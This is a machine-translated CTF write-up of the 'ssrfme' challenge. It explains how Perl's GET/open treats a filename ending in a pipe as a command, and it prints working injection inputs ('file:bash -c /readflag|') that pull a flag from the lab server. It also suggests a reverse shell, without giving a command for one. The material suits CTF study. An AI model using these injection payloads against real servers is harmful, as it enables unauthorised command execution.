current position:Home>I spring and autumn CTF ssrfme (get command vulnerability in Peal function) command execution detailed problem solution + principle learning process

I spring and autumn CTF ssrfme (get command vulnerability in Peal function) command execution detailed problem solution + principle learning process

2022-01-26 21:54:41 AAAAAAAAAAAA66

Just a few days ago, I was tired of doing a problem of command execution , This will brush the question and encounter another , I saw a lot of write up There are no different places , And the environment of this question is a little different from that of other platforms , There are some wirte up Reproduction can't even do , Finally, when you think alone , Just found a lot of fine energy-saving improvements . So to sum up , Sort out all the knowledge you have learned . Avoid people stepping on some unnecessary pits , Waste time in vain .

Catalog

subject

peal Function get Command vulnerability

analysis

a key

Answer key

Detailed process

Thinking about this problem


subject

peal Function get Command vulnerability

Here we refer to the analysis of a blogger , I checked it write up The most detailed written in , Of course, the problem he did is different from that on our platform , But it has reference value .

About BMZCTF hitcon_2017_ssrfme Solution method _ Always a teenager -CSDN Blog

About this loophole , Foreigners have articles , It's written like this :
Perl saw that your “file” ended with a “pipe” (vertical
bar) character. So it interpreted the “file” as a command to be executed, and interpreted the command’s output as the “file”'s contents. The command is “who” (which prints information on currently logged-in users). If you execute that command, you will see that the output is exactly what the Perl program gave you.
Translation means :
perl Function to see if the name of the file to be opened is marked with a pipe character ( The vertical bar on the keyboard |) ending , Will interrupt the original open file operation , And execute the file name as a command , And write the execution result of the command as the content of this file . The execution authority of this command is the current login . If you execute this command , You'll see perl Results of program operation .

 

So we can url Parameter obtain flag The order of the document , After execution , take flag Put the content in the file we uploaded , When we open the file we uploaded, we can see flag 了 .

analysis

<?php 
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); 
    @mkdir($sandbox); 
    @chdir($sandbox); 

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 
    $info = pathinfo($_GET["filename"]); 
    $dir  = str_replace(".", "", basename($info["dirname"])); 
    @mkdir($dir); 
    @chdir($dir); 
    @file_put_contents(basename($info["basename"]), $data); 
    highlight_file(__FILE__); 

Simply audit the code

$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

Get the user's ip, And will MD5 after orangeip As the folder name ( here ip Order your own ip)

a key

$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

get The request for url value , And use escapeshellarg The function will input url transcoding ,. after shell_exec perform ( Command execution ) By escapeshellarg After transcoding url Parameter values , And store the result of command execution in data in , In the following code , Will data( That is, the result of this command execution ) Put it in the folder we passed in .

In fact, here , You can use rebound shell The way to do ,

escapeshellarg:
(PHP 4 >= 4.0.3, PHP 5, PHP 7)
Transcoding a string so that it can be used in shell The parameters used in the command
string escapeshellarg ( string $arg )
escapeshellarg() Will add a single quotation mark to the string and can reference or transcode any existing single quotation marks , This ensures that a string can be passed directly into shell function , And it's safe . This function should be used for some parameters entered by the user .shell Function contains exec(), system() The execution operator
summary :
1. Ensure that the user passes only one parameter to the command
2. The user cannot specify more parameters
3. Users cannot execute different commands

$info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);

Next get Request file name , And use str_replace Filter .,  It is not allowed to pass through ../ Change the location of file transfer . If filename Address , Will change the current directory to filename Under the absolute path .

@file_put_contents(basename($info["basename"]), $data);
Last , hold data The content in (url Value executed ) The incoming to filename in .

Answer key

 Ideas 
1. First use  ?url=/&filename=qqq  Use here  /, As a parameter url Value ,/ stay linux Inside is the syntax to return to the previous level ,
 This is to execute /, Get and change the server root directory .
2. then   visit /sandbox/md5/qqq  Get the file directory 
 Here you can see flag and readflag file ,flag stay readflag Inside   So we have to execute readflag Documents can be obtained flag
 Construct the following statement 
3.?url=&filename=bash -c /readflag|  Create a folder   The folder name is command execution statement   Content is empty ( Random filling , No effect )
4.?url=file:bash -c /readflag|&filename=321  To execute by command , Finish the execution readflag The obtained value is stored in 321 file 
5. visit /sandbox/md5/321  get flag

Detailed process

obtain MD5 value

Baidu Input ip Get your own ip value , Than ipconfig fast , ha-ha .

  Then Baidu search MD5 encryption

  obtain MD5 value

Look at the root directory

?url=/&filename=qqq
/sandbox/md5/qqq

 

?url=&filename=bash -c /readflag|
?url=file:bash -c /readflag|&filename=321 

There's a question mark here. Don't mind ( No effect )

 

obtain flag

 

 

flag{d9faf0e7-6152-48be-8c5c-479c9681bcf3}

Thinking about this problem

1. First of all, this question url Obviously it can pass parameters , Why not url Directly execute the command to view flag, Why use it GET Medium open Function command execution , I'm in some write up We can also see such a solution in ( Finally, I tried , At most, you can get a garbled file ), It's all the same question ,[hitcon 2017]ssrfme, Pass directly to url Command execution to get flag. in addition , If you must use every time get If there is a loophole in the function , That first step is useless | Pipe, , Did you succeed in executing the command . The suspicion here is i Spring and autumn website has this prevention or filtering for command execution ?

2. Since there are commands to execute , You can rebound shell Method to obtain flag, Refer to a topic I just wrote recently , But it may also be because i Spring and autumn website , Filtering of some commands results in no .( Maybe it's my food , ha-ha ) Here's the process I wrote , Welcome the boss to correct

i spring and autumn Death ping command Principle learning ( Command execution +shell rebound )+ Reappear _AAAAAAAAAAAA66 The blog of -CSDN Blog

flowers 2 Look for the cover in minutes

 

 

 

 

copyright notice
author[AAAAAAAAAAAA66],Please bring the original link to reprint, thank you.
https://en.cdmana.com/2022/01/202201262154373824.html

Random recommended